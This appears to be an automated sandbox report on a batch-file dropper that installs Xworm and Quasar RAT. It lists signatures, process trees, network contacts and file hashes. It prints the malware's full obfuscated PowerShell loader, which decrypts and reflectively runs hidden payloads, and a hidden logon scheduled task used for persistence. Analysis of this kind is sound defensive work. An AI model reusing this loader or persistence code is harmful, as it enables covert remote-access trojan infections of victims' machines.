SHA512 ad1ae0cb28d4817e4da1704bb8d5ccf8503efea59117696b72552986aaf22dc99dbed995aa7423e36881faddaf066c7e3481e37d2d27deb4d5a3347d4fc03583

memory/3076-97-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2380-99-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/3076-98-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-110-0x000001745DA50000-0x000001745DB82000-memory.dmp

memory/3076-111-0x000001745DBB0000-0x000001745DED4000-memory.dmp

memory/3076-112-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-113-0x000001745E230000-0x000001745E280000-memory.dmp

memory/3076-114-0x000001745E340000-0x000001745E3F2000-memory.dmp

memory/3076-115-0x000001745EE70000-0x000001745F032000-memory.dmp

memory/3076-116-0x000001745E200000-0x000001745E212000-memory.dmp

memory/3076-117-0x000001745E2C0000-0x000001745E2FC000-memory.dmp

memory/4068-118-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-120-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/4068-119-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/3076-121-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/3076-122-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-123-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-124-0x0000017441700000-0x0000017441710000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win11-20240412-en

Max time kernel

41s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1752 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4828 wrote to memory of 3964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3964 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3964 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 964 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 964 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 920 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 920 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 4708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2864 wrote to memory of 4708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4708 wrote to memory of 4572 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4708 wrote to memory of 4572 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4572 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_750_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_750.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_750.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_750.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_750.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_750.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_462_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_462.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_462.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_462.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_462.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_462.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.19:27030 china-earth.gl.at.ply.gg tcp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 147.185.221.19:27030 china-earth.gl.at.ply.gg tcp
DE 195.201.57.90:443 ipwho.is tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bof1uym4.45m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb15ee5741b379245ca8549cb0d4ecf8
SHA1 3555273945abda3402674aea7a4bff65eb71a783
SHA256 b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\startup_str_750.vbs

MD5 5b5871d2529094b78a49750b45ea5f47
SHA1 c16477f999f91c6fca245bc44960b08e5bab7cc5
SHA256 4ec3b80d570e07948ea72aecb87d80bf4805d1c32ec1737ea00f1b6ad8adeb9c
SHA512 b657829cd2d72cddd71e5603b15baa3b86c77fbd65ea50fb65d06f900d5ed272a922084235861ac4260f72f2f682909af997e7142110801349798dbf41849733

C:\Users\Admin\AppData\Roaming\startup_str_750.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9665f44079e2ed28b3d426623291b219
SHA1 cc9ed0d8ffbb49e98034acca27f073b6db66032b
SHA256 6c8f1b0f7f78cbb20b1f0d8a41d80f47feb831ebb9ac64f3a868d3d124d4edfb
SHA512 86c4ed22bbaeeb12d53f547559d55121f5401bf3c830be67b7504b60e057d93ab88d65cbd59425e4be7fb5addc013a9115ec732afb101bf8500c438024ba1c0a

C:\Users\Admin\AppData\Roaming\startup_str_462.vbs

MD5 fbca8f20e020c40f9a96b1b8eec2ec45
SHA1 6aa4eb6de07215aa102e65e8fe94bec01b9faf5e
SHA256 6ed43ebd4b884bfb71fe6bb5022ca80da1e2697419b5e4cf9f9e2a1c5f1a3de5
SHA512 01d4a1f2eec871858504376f5764ce6135bf1b31e3edfe20f359568899984c6aecc13169a17873b74fdf72d0f825991c18a14133f0c65aaed9e3cbcc121b08f9

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win10-20240404-en

Max time kernel

69s

Max time network

76s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
